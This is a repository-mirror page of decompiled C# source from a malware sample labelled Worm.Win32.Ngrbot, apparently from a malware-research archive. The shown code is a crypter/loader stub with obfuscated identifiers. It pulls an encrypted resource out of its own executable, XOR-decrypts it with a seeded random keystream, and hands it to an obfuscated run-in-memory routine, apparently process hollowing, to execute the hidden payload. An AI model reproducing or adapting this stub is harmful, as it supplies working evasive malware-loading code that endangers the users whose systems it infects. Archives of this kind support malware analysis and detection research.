mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 03:16:11 +00:00
f2ac1ece55
add
54 lines
2.7 KiB
C#
54 lines
2.7 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: ƀƚąƫcħ.Module1
|
||
// Assembly: NoStartUp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 14163617-1CB3-4844-9F67-2DC4A344E71C
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.exe
|
||
|
||
using Microsoft.VisualBasic.CompilerServices;
|
||
using System;
|
||
using System.Diagnostics;
|
||
using System.Runtime.InteropServices;
|
||
|
||
namespace ƀƚąƫcħ
|
||
{
|
||
[StandardModule]
|
||
internal sealed class Module1
|
||
{
|
||
[DllImport("kernel32.dll", SetLastError = true)]
|
||
private static extern IntPtr FindResource(IntPtr ħМøƋυƪȝ, string ƪƥŊąɱȝ, string ƪƥƬƴƥȝ);
|
||
|
||
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
|
||
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
|
||
|
||
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
||
private static extern IntPtr LoadResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
|
||
|
||
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
||
private static extern int SizeofResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
|
||
|
||
[DllImport("kernel32", EntryPoint = "CopyFileA", CharSet = CharSet.Ansi, SetLastError = true)]
|
||
private static extern long CopyFile([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpExistingFileName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpNewFileName);
|
||
|
||
[STAThread]
|
||
public static void main()
|
||
{
|
||
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
|
||
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
|
||
IntPtr resource = Module1.FindResource(moduleHandle, "0", "RT_RCDATA");
|
||
IntPtr source = Module1.LoadResource(moduleHandle, resource);
|
||
int length = Module1.SizeofResource(moduleHandle, resource);
|
||
byte[] numArray = new byte[length - 1 + 1 - 1 + 1];
|
||
Marshal.Copy(source, numArray, 0, length);
|
||
int int32_1 = BitConverter.ToInt32(numArray, Convert.ToInt32(numArray.Length - 4));
|
||
byte[] Ƌąƫą = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[numArray.Length - 3 + 1 - 1 + 1]);
|
||
Random random = new Random(int32_1);
|
||
byte[] buffer = new byte[Ƌąƫą.Length - 1 + 1 - 1 + 1];
|
||
random.NextBytes(buffer);
|
||
int int32_2 = Convert.ToInt32(Ƌąƫą.Length - 1);
|
||
for (int index = 0; index <= int32_2; ++index)
|
||
Ƌąƫą[index] = Convert.ToByte((byte) ((int) Ƌąƫą[index] ^ (int) buffer[index]));
|
||
Ʀυŋƥȝƪąƨƨ.ƦυŋƥȝƧυƀ(Ƌąƫą, Process.GetCurrentProcess().MainModule.ModuleName);
|
||
}
|
||
}
|
||
}
|